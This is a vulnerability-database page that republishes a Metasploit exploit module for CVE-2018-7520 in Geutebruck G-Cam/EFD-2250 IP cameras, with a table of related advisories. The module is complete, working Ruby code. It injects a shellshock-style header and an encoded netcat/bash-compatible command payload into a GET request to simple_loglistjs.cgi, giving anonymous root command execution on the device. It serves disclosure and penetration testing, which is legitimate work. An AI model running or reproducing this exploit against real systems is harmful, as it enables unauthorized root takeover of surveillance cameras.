Lucene search
+L

Geutebruck 5.02024 G-Cam/EFD-2250 - simple_loglistjs.cgi Remote Command Execution Exploit

🗓️ 03 Jul 2018 00:00:00Reported by RandoriSecType 
zdt
 zdt
🔗 0day.today👁 87 Views

Geutebruck G-Cam/EFD-2250 simple_loglistjs.cgi Remote Command Executio

Related
Code
ReporterTitlePublishedViews
Family
cnvd
CNVD
Geutebruck IP Cameras Incorrect Access Control Vulnerability
22 Mar 201800:00
cnvd
cve
CVE
CVE-2018-7520
22 Mar 201818:00
cve
cvelist
Cvelist
CVE-2018-7520
22 Mar 201818:00
cvelist
exploitdb
Exploit DB
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
2 Jul 201800:00
exploitdb
euvd
EUVD
EUVD-2018-19249
7 Oct 202500:30
euvd
exploitpack
exploitpack
Geutebruck 5.02024 G-CamEFD-2250 - simple_loglistjs.cgi Remote Command Execution (Metasploit)
2 Jul 201800:00
exploitpack
ics
ICS
Geutebruck IP Cameras
20 Mar 201800:00
ics
nvd
NVD
CVE-2018-7520
22 Mar 201818:29
nvd
osv
OSV
CVE-2018-7520
22 Mar 201818:29
osv
packetstorm
Packet Storm
Geutebruck simple_loglistjs.cgi Remote Command Execution
2 Jul 201800:00
packetstorm
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits a an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
        anonymous user to execute arbitrary commands with root privileges.
        Firmware <= 1.12.0.19 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
      },
      'Author'         =>
        [
          'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
          'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-7520' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat bash',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 20 2018'))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
      ], self.class)
  end
 
  def exploit
    header = "(){ :;}; "
    encpayload = "#{header}#{payload.encoded}"
    uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_raw(
      {
        'method' => 'GET',
        'uri'    => uri
    })
  end
 
end

#  0day.today [2018-07-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation